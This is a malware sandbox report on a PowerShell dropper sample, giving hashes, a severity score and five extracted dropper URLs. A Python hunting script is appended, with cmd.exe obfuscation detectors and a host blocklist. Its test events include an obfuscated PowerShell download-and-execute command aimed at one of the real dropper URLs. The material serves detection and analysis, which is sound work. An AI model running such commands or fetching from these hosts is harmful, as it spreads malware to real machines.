General

  • Target

    b32d967d7edc07d99b55230add746849_JaffaCakes118

  • Size

    84KB

  • Sample

    240616-m6yzqsvcpn

  • MD5

    b32d967d7edc07d99b55230add746849

  • SHA1

    ed64498d29f40ccc07c7fbfa2a0a05e29763f5e2

  • SHA256

    9a1eb53df4d78dc1896b3dfe00ed0818391b12593cebf80b71b48b3623c28de0

  • SHA512

    548c09142c363313c89229e08dc4555897ed8b153c15a5a89efc4d624dc6953b90c574b04e114e23d6866c549b18e64141493e826a577ebaecb59e031dbe04b3

  • SSDEEP

    768:hpJcaUitGAlmrJpmxlzC+w99NB55D+1od2rUPJcogB+/sDy1IDJynMviAgpLApk:hptJlmrJpmxlRw99NBj+aDKWWyndA

Score
10/10

Malware Config

Extracted (deobfuscated)

  • Language

    ps1

  • URLs (exe.dropper)

    http://audioauthorities.com/9B0
    http://tandleaccountancy.co.uk/ZDSIM
    http://thecardz.com/NTGpsf
    http://xuatbangiadinh.vn/H
    http://xn--b1axgdf5j.xn--j1amh/a

Targets

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Obfuscated cmd.exe command line

      An obfuscated cmd.exe command line is typically used to evade detection.
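The two behaviours flagged above (a document handler spawning an interpreter, and an obfuscated cmd.exe command line) plus the five exe.dropper URLs in the extracted config are the hunt material this report yields. A dropper config with several URLs normally means the script tries each in turn until one serves a payload, so all five belong on the blocklist, not just the first. The script below is an added example, not part of the sandbox report or its tooling: it runs that logic over Sysmon-style process-creation events. Only the five URLs come from the page; the parent and interpreter lists, the obfuscation heuristics (caret insertion, environment-variable substring expansion and delayed expansion, in the style of Invoke-DOSfuscation), and every event, path and command line are constructed assumptions.

```python
"""
Added example (not part of the sandbox report): hunt logic for the two
behaviours the report flags, run over constructed Sysmon-style events.
Only DROPPER_URLS is taken from the report; everything else is assumed.
"""
import re
from urllib.parse import urlsplit

# From the report's "Malware Config" section (exe.dropper URLs).
DROPPER_URLS = [
    "http://audioauthorities.com/9B0",
    "http://tandleaccountancy.co.uk/ZDSIM",
    "http://thecardz.com/NTGpsf",
    "http://xuatbangiadinh.vn/H",
    "http://xn--b1axgdf5j.xn--j1amh/a",
]

# Assumed lists: document handlers that should never launch an interpreter.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# cmd.exe obfuscation tricks (Invoke-DOSfuscation style), assumed heuristics.
CARET = re.compile(r"\^")                                          # p^o^w^e^r^s^h^e^l^l
ENV_SLICE = re.compile(r"%\w+:~\s*-?\d+(?:\s*,\s*-?\d+)?%")        # %PUBLIC:~9,1%
DELAYED_EXPANSION = re.compile(r"/v(?::on)?\b.*!\w+!", re.I | re.S)  # cmd /v:on ... !x!
URL = re.compile(r"https?://[^\s'\"(),;]+", re.I)


def basename(path):
    """Last path component, lower-cased, for both slash styles."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def dropper_hosts(urls=DROPPER_URLS):
    """Sorted hostnames for a DNS/proxy blocklist; IDNA labels stay encoded."""
    return sorted({urlsplit(u).hostname for u in urls})


def unicode_hosts(urls=DROPPER_URLS):
    """Decoded form of each host for the analyst; falls back to the ASCII form."""
    out = []
    for h in dropper_hosts(urls):
        try:
            out.append(h.encode("ascii").decode("idna"))
        except UnicodeError:
            out.append(h)
    return out


def obfuscation_indicators(cmdline):
    """Names of the cmd.exe obfuscation techniques present in a command line."""
    found = []
    if len(CARET.findall(cmdline)) >= 3:      # one or two carets occur in benign use
        found.append("caret-insertion")
    if ENV_SLICE.search(cmdline):
        found.append("env-var-substring")
    if DELAYED_EXPANSION.search(cmdline):
        found.append("delayed-expansion")
    return found


def triage_event(event):
    """Reasons an event is suspicious; an empty list means nothing fired."""
    reasons = []
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    if parent in DOCUMENT_PARENTS and image in INTERPRETERS:
        reasons.append(f"unexpected child: {parent} -> {image}")
    if image == "cmd.exe":
        for tag in obfuscation_indicators(event["CommandLine"]):
            reasons.append(f"obfuscated cmd.exe: {tag}")
    for u in URL.findall(event["CommandLine"]):
        if u in DROPPER_URLS:
            reasons.append(f"config URL: {u}")
    return reasons


# Constructed events; the command lines are illustrative, not the sample's own.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /v:on /c \"set p=p^o^w^e^r^s^h^e^l^l&& !p! -nop -w hidden -c "
                    "IEX(New-Object Net.WebClient).DownloadString('http://thecardz.com/NTGpsf')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c dir %USERPROFILE%"},
    # %PUBLIC% is C:\Users\Public, so %PUBLIC:~9,1% expands to the letter P.
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c %PUBLIC:~9,1%owershell -nop -w hidden -c Start-Process C:\Users\Public\a.exe"},
]

if __name__ == "__main__":
    print("blocklist:", dropper_hosts())
    for i, ev in enumerate(EVENTS):
        print(i, triage_event(ev) or "nothing fired")
```

In production the `EVENTS` list is replaced by Sysmon Event ID 1 or EDR process-creation telemetry; the caret threshold and the parent list are the knobs to tune for a given estate, and the URL match should be extended to host-level matching on proxy logs, since the path component changes between campaigns far more often than the compromised host does.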

MITRE ATT&CK Enterprise v15
